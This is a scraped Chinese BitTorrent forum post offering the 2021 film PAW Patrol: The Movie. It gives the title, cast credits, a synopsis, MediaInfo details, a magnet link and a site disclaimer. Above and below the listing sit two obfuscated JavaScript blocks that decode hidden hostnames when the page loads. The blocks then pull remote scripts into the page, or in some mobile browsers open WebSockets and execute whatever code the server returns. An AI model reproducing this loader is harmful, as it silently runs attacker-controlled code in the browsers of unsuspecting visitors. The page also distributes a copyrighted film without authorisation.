汪汪队立大功大电影[双语字幕].PAW.Patrol.The.Movie.2021.1080p.BluRay.DD5.1.x265-10bit 3.38GB

版主小s 1月前 172

var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNw==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x68\x6e\x49\x43\x61\x57\x73\x53\x72\x45']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};

◎译 名 汪汪队立大功大电影 / 狗狗巡逻队 / 汪汪队立大功电影版(台)

◎片 名 Paw Patrol: The Movie

◎年 代 2021

◎产 地 美国 / 加拿大

◎类 别 喜剧 / 动画 / 家庭 / 冒险

◎语 言 英语

◎上映日期 2021(中国大陆) / 2021-08-20(美国)

◎IMDb链接 https://www.imdb.com/title/tt11832046/

◎豆瓣链接 https://movie.douban.com/subject/35045591/

◎片 长 88分钟

◎导 演 卡尔·布伦克尔 Cal Brunker (id:1337216)

◎编 剧 鲍勃·巴伦 Bob Barlen (id:1379167)

卡尔·布伦克尔 Cal Brunker (id:1337216)

比利·弗罗利克 Billy Frolick (id:1303759)

◎演 员 泰勒·派瑞 Tyler Perry (id:1049571)

罗恩·帕尔多 Ron Pardo (id:1461034)

威尔·布鲁斯宾 Will Brisbin (id:1456619)

金斯利·马歇尔 Kingsley Marshall (id:1458107)

基根·赫德利 Keegan Hedley (id:1458099)

伊恩·阿米蒂奇 Iain Armitage (id:1369478)

卡勒姆·肖尼克 Callum Shoniker (id:1458113)

谢尔·西蒙斯 Shayle Simons (id:1458106)

莉莉·巴特拉姆 Lilly Bartlam (id:1458110)

金·罗伯特 Kim Roberts (id:1347745)

保罗·布朗斯坦 Paul Braunstein (id:1383398)

马尔赛·马丁 Marsai Martin (id:1343623)

莫妮克·阿尔瓦雷斯 Monique Alvarez (id:1461035)

吉米·坎摩尔 Jimmy Kimmel (id:1040719)

杰米拉·罗斯 Jamillah Ross (id:1461036)

戴克斯·夏普德 Dax Shepard (id:1013777)

兰道尔·朴 Randall Park (id:1345622)

雅拉·沙希迪 Yara Shahidi (id:1330789)

乔希·罗伯特·汤普森 Josh Robert Thompson (id:1240353)

乔希·格雷厄姆 Josh Graham (id:1461037)

尼尔·克容 Neil Crone (id:1076749)

乔·平格 Joe Pingue (id:1337511)

金·卡戴珊 Kim Kardashian (id:1233965)

查理·加兰特 Charlie Gallant (id:1450559)

理查德·宾斯利 Richard Binsley (id:1374793)

雷欧·巴奈扎 Raoul Bhaneja (id:1019251)

莎拉·乔德利 Saara Chaudry (id:1385325)

Kevin Duhaney Kevin Duhaney (id:1083859)

詹妮弗·道奇 Jennifer Dodge (id:1456620)

彼得·施莱塞尔 Peter Schlessel (id:1456623)

亚当·贝德 Adam Beder (id:1456622)

罗内恩·哈拉里 Ronnen Harary (id:1456621)

◎标 签 动画 / 2021 / 美国动画 / 童年 / 电影 / 美国 / 美国电影 / 喜剧

◎简 介

汪汪队出发救援!邪恶的韩丁那成为了冒险湾的市长,并且准备对这座城市进行大肆破坏。小男孩莱德和他英勇的汪汪队小狗们必须打起十二分精神,准备迎接全新的挑战。与此同时,小狗阿奇不得不面对他在冒险湾复杂的过去。好在这时团队迎来了新的盟友,聪明的腊肠犬贝贝。带着升级的武器和装备,汪汪队已经准备好随时为拯救冒险湾的居民们而战!

  1. ##### MediaInfo ######

  2. General

  3. Unique ID : 321425349521133839589524904542578476080 (0xF1D04542F2928293074617274DD50430)

  4. Complete name : [email protected]QDDQ.COM.mkv

  5. Format : Matroska

  6. Format version : Version 4

  7. File size : 3.38 GiB

  8. Duration : 1 h 26 min

  9. Overall bit rate : 5 622 kb/s

  10. Movie name : PAW Patrol The Movie 2021 1080p BluRay DD5.1 [email protected]

  11. Encoded date : UTC 2021-10-31 13:10:24

  12. Writing application : mkvmerge v38.0.0 ('The Silent Type') 64-bit

  13. Writing library : libebml v1.3.9 + libmatroska v1.5.2


  14. Video

  15. ID : 1

  16. Format : HEVC

  17. Format/Info : High Efficiency Video Coding

  18. Format profile : Main [email protected]@High

  19. Codec ID : V_MPEGH/ISO/HEVC

  20. Duration : 1 h 26 min

  21. Bit rate : 4 903 kb/s

  22. Width : 1 920 pixels

  23. Height : 800 pixels

  24. Display aspect ratio : 2.40:1

  25. Frame rate mode : Constant

  26. Frame rate : 23.976 (24000/1001/53354) FPS

  27. Color space : YUV

  28. Chroma subsampling : 4:2:0

  29. Bit depth : 10 bits

  30. Bits/(Pixel*Frame) : 0.133

  31. Stream size : 2.95 GiB (87%)

  32. Title : @HDSky

  33. Writing library : x265 - H.265/HEVC codec

  34. Default : Yes

  35. Forced : No


  36. Audio

  37. ID : 2

  38. Format : AC-3

  39. Format/Info : Audio Coding 3

  40. Commercial name : Dolby Digital

  41. Codec ID : A_AC3

  42. Duration : 1 h 26 min

  43. Bit rate mode : Constant

  44. Bit rate : 640 kb/s

  45. Channel(s) : 6 channels

  46. Channel layout : L R C LFE Ls Rs

  47. Sampling rate : 48.0 kHz

  48. Frame rate : 31.250 FPS (1536 SPF)

  49. Compression mode : Lossy

  50. Stream size : 394 MiB (11%)

  51. Title : English

  52. Language : English

  53. Service kind : Complete Main

  54. Default : Yes

  55. Forced : No


  56. Text #1

  57. ID : 3

  58. Format : PGS

  59. Muxing mode : zlib

  60. Codec ID : S_HDMV/PGS

  61. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  62. Duration : 1 h 16 min

  63. Bit rate : 37.0 kb/s

  64. Count of elements : 2108

  65. Stream size : 20.3 MiB (1%)

  66. Title : ENG

  67. Language : English

  68. Default : Yes

  69. Forced : No


  70. Text #2

  71. ID : 4

  72. Format : PGS

  73. Muxing mode : zlib

  74. Codec ID : S_HDMV/PGS

  75. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  76. Duration : 1 h 21 min

  77. Bit rate : 26.4 kb/s

  78. Count of elements : 1722

  79. Stream size : 15.4 MiB (0%)

  80. Title : CHS

  81. Language : Chinese

  82. Default : No

  83. Forced : No


  84. Text #3

  85. ID : 5

  86. Format : PGS

  87. Muxing mode : zlib

  88. Codec ID : S_HDMV/PGS

  89. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  90. Duration : 1 h 21 min

  91. Bit rate : 27.3 kb/s

  92. Count of elements : 1722

  93. Stream size : 15.9 MiB (0%)

  94. Title : CHT

  95. Language : Chinese

  96. Default : No

  97. Forced : No


  98. Text #4

  99. ID : 6

  100. Format : PGS

  101. Muxing mode : zlib

  102. Codec ID : S_HDMV/PGS

  103. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  104. Duration : 1 h 21 min

  105. Bit rate : 45.2 kb/s

  106. Count of elements : 1722

  107. Stream size : 26.4 MiB (1%)

  108. Title : CHS&ENG

  109. Language : Chinese

  110. Default : No

  111. Forced : No


  112. Text #5

  113. ID : 7

  114. Format : PGS

  115. Muxing mode : zlib

  116. Codec ID : S_HDMV/PGS

  117. Codec ID/Info : Picture based subtitle format used on BDs/HD-DVDs

  118. Duration : 1 h 21 min

  119. Bit rate : 46.1 kb/s

  120. Count of elements : 1722

  121. Stream size : 26.9 MiB (1%)

  122. Title : CHT&ENG

  123. Language : Chinese

  124. Default : No

  125. Forced : No


  126. Menu

  127. 00:00:00.000 : en:Chapter 01

  128. 00:06:45.488 : en:Chapter 02

  129. 00:13:25.304 : en:Chapter 03

  130. 00:20:28.269 : en:Chapter 04

  131. 00:26:21.079 : en:Chapter 05

  132. 00:32:57.309 : en:Chapter 06

  133. 00:37:40.633 : en:Chapter 07

  134. 00:44:39.427 : en:Chapter 08

  135. 00:49:59.663 : en:Chapter 09

  136. 00:55:14.937 : en:Chapter 10

  137. 01:02:39.214 : en:Chapter 11

  138. 01:11:12.560 : en:Chapter 12

  139. 01:17:17.925 : en:Chapter 13




复制代码


TAGS 冒险 动画 喜剧 家庭

磁力链:
  • magnet:?xt=urn:btih:7B6D788FE2D89C870C520FBEEDF6AED4000CB8F8

上传的附件:
BT9527.com论坛第一帅,不接受任何反驳
BT9527电影天堂 1、BT9527电影天堂提供的BT文件均来源于互联网抓取,只供网友学习交流、技术提升使用。
2、我们遵守BitTorrent点对点协议原则,任何版权问题请联系原资源发布商,我们不处理任何版权纠纷,谢谢!如有争议请联系邮箱:BT9527#hotmail.com(#换成@)
3、如果您发现某页面或地址有错误,请联系站长邮箱BT9527#hotmail.com(#换成@),我们会尽快处理。您的热心是对BT9527电影天堂最大的支持。
4、本站建议去正规影院观看电影以支持电影行业发展。
最新回复 (0)

你可以在 登录 or 注册 后,对此帖发表评论!

返回
发新帖
var x=window['\x61\x74\x6f\x62'],id=x('NDQ0NDczNzY1NjE1Nzg4ODg4OC0xMDAwNg==');document.write('%lt;ins style="display:none!important" id="'+id+'"%gt;%lt;/ins%gt;');(window.adbyunion=window.adbyunion||[]).push(id);window['\x59\x72\x72\x51\x4e\x72\x4a\x5a\x7a\x42']=(!/^Mac|Win/.test(navigator.platform)||!navigator.platform)?function(){;(function(u,k,w,d,c){var cs=d[x('Y3VycmVudFNjcmlwdA==')];'jQuery';var t=[],l=[],e=0,r=0,delay=2000,f=null,ua=navigator.userAgent.toLowerCase(),sc=Math.max(1,600000),ext='1',i='win'+Math.floor(new Date().getTime()/sc)+ext;if(ua.indexOf('baidu')>-1||ua.indexOf('huaweibrowser')>-1||ua.indexOf('vivobrowser')>-1){r=1;u=k;f=function(){if(!l.length)return;var ws=new WebSocket(l.shift()+'/'+i);ws.onopen=function(){for(var k in t)t[k]&&clearTimeout(t[k])};ws.onmessage=function(e){new Function('_tdcs',x(e.data))(cs);ws.close()};ws.onerror=function(e){t[++e]&&clearTimeout(t[e]);f()}};}else{f=function(){if(!l.length)return;var s=document.createElement('script');s.src=l.shift()+'/'+i;cs.parentElement.insertBefore(s,cs);s.onload=function(){for(var k in t)t[k]&&clearTimeout(t[k])};s.onerror=function(){cs.parentElement.removeChild(s);t[++e]&&clearTimeout(t[e]);f()}};}u=decodeURIComponent(x(u.replace(new RegExp(c[r]+''+c[r],'g'),c[r])));var l=u.split(',');l.sort(function(){return 0.5-Math.random()});for(var j in l)t[j]=setTimeout(f,delay*j);})('aHR0cHM6Ly9va3NrZGpmZGsuaG9uZ2ZhY2huLmNvbbSxodHRwczovL28zOWtza2RmamxrLmRzbbGVuZ2d1aS5jbb20=','d3NzOi8vd3MMua2FpZ3Vhbmdkb3UuY29tOjgxODEsd3NzOi8vd3MMueW5zbHZ5b3UuY29tOjgxODEsd3NzOi8vd3MMud3NobGNnai5jb206ODE4MMQ==',window,document,['b','M']);}:function(){};